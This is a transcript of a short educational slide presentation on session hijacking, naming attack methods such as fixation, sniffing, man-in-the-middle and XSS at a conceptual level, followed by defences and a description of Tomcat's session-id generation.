Presentation is loading. Please wait.

Presentation is loading. Please wait.

Ram Santhanam Application Level Attacks - Session Hijacking & Defences

Published byJanis Todd Modified over 8 years ago

Similar presentations

Presentation on theme: "Ram Santhanam Application Level Attacks - Session Hijacking & Defences"— Presentation transcript:

1 Ram Santhanam Application Level Attacks - Session Hijacking & Defences
Project Presentation Ram Santhanam Application Level Attacks - Session Hijacking & Defences

2 What is a session? Definition from FOLDOC
A lasting connection between a user (or user agent i.e. browser) and a server usually involving the exchange of many requests Typically maintained by the server Includes a data store or a table to store user state and other user specific information Includes an index to the table (aka session key or session-id) Created on first request or after an authentication process Session-id exchanged between browser and server on every request. Different ways to exchange session-ids URL Rewriting Hidden Form fields Cookies (most common) Hijacking Stealing of this session-id and using it to impersonate and access data Passive attack difficult to detect

3 Typical Session

4 Attack Methods Guessing Session Id Session Fixing
shorter length, predictable Session Fixing predictable, session created before authenticated Security Vulnerabilities in Hops trusting private networks, vulnerabilites in web servers, etc Session Sniffing (typical on non SSL sessions) same subnet as client or server Man in the Middle Attack (SSL) ARP Poisoning, DNS Spoofing Cross Site Scripting (XSS) User trusting source, application vulnerability

5 Session Sniffing

6 Man in the Middle Attack

7 Cross Site Scripting (XSS)
Hacker inserts a rogue script to a trusted site. Common in social / community sites.

8 Defence Methods Educating the users
Paying attention to https vs. non-https Properly signing out Not clicking on links but copying and pasting them. Using high entropy in session id generation (see Tomcat e.g.) Higher the entropy more difficult to predict Timing out sessions reduce window of vulnerability Using SSL for all communications difficult to sniff Forcing Re-authentication or step-up authentication limit damage if session is hijacked Re-generating session-ids Using Context data for validating session-ids. make it difficult to use a hijacked id Input validation prevent XSS and other vulnerabilities

9 Tomcat Session Id generation
The session id is generated through by a random number. For random number generation, Java's SecureRandom class is used. This class provides a cryptographically strong random number generator using DSA/RSA/MD5 or SHA-1 The seed (64 bit) for generating the random number is constructed by bitwise xoring the system time with an entropy string The entropy string comes from a hash value constructed from the device drivers running on the server. Using the SecureRandom class a 16 (128 bit) byte random number is generated. A one way hash of the random number is performed. A 32 byte (256 bit) hexadecimal number is created from by taking 4 bits at a time from the 16 bytes. This 32 byte (256 bit) is used as the jsessionid

10 Questions?

Download ppt "Ram Santhanam Application Level Attacks - Session Hijacking & Defences"

Similar presentations

Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
The OWASP Foundation Web Application Security Host Apps Firewall Host Apps Database Host Web serverApp serverDB server Securing the.

The OWASP Foundation Web Application Security Host Apps Firewall Host Apps Database Host Web serverApp serverDB server Securing the.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
SEC835 OWASP Top Ten Project.

SEC835 OWASP Top Ten Project.
SSL CS772 Fall 2011. Secure Socket layer Design Goals: SSLv2) SSL should work well with the main web protocols such as HTTP. Confidentiality is the top.

SSL CS772 Fall Secure Socket layer Design Goals: SSLv2) SSL should work well with the main web protocols such as HTTP. Confidentiality is the top.
Topic 8: Secure communication in mobile devices. Choice of secure communication protocols, leveraging SSL for remote authentication and using HTTPS for.

Topic 8: Secure communication in mobile devices. Choice of secure communication protocols, leveraging SSL for remote authentication and using HTTPS for.
Common Exploits Aaron Cure Cypress Data Defense. SQL Injection.

Common Exploits Aaron Cure Cypress Data Defense. SQL Injection.
More on SSL/TLS. Internet security: TLS TLS is one of the more prominent internet security protocols. TLS is one of the more prominent internet security.

More on SSL/TLS. Internet security: TLS TLS is one of the more prominent internet security protocols. TLS is one of the more prominent internet security.
Attacking Session Management Juliette Lessing

Attacking Session Management Juliette Lessing
Hacking Presented By :KUMAR ANAND SINGH 04-243,ETC/2008.

Hacking Presented By :KUMAR ANAND SINGH ,ETC/2008.
Security Issues and Challenges in Cloud Computing

Security Issues and Challenges in Cloud Computing
A Third Party Service for Providing Trust on the Internet Work done in 2001 at HP Labs by Michael VanHilst and Ski Ilnicki.

A Third Party Service for Providing Trust on the Internet Work done in 2001 at HP Labs by Michael VanHilst and Ski Ilnicki.
Time Passes, Security Changes… Christian Huitema Monday, August 1, 2005 IETF, Application Area Meeting.

Time Passes, Security Changes… Christian Huitema Monday, August 1, 2005 IETF, Application Area Meeting.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
WEB SECURITY. WEB ATTACK TYPES Buffer OverflowsXML InjectionsSession Hijacking Attacks WEB Attack Types.

WEB SECURITY. WEB ATTACK TYPES Buffer OverflowsXML InjectionsSession Hijacking Attacks WEB Attack Types.
Online Security Tuesday April 8, 2003 Maxence Crossley.

Online Security Tuesday April 8, 2003 Maxence Crossley.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Similar presentations

Ads by Google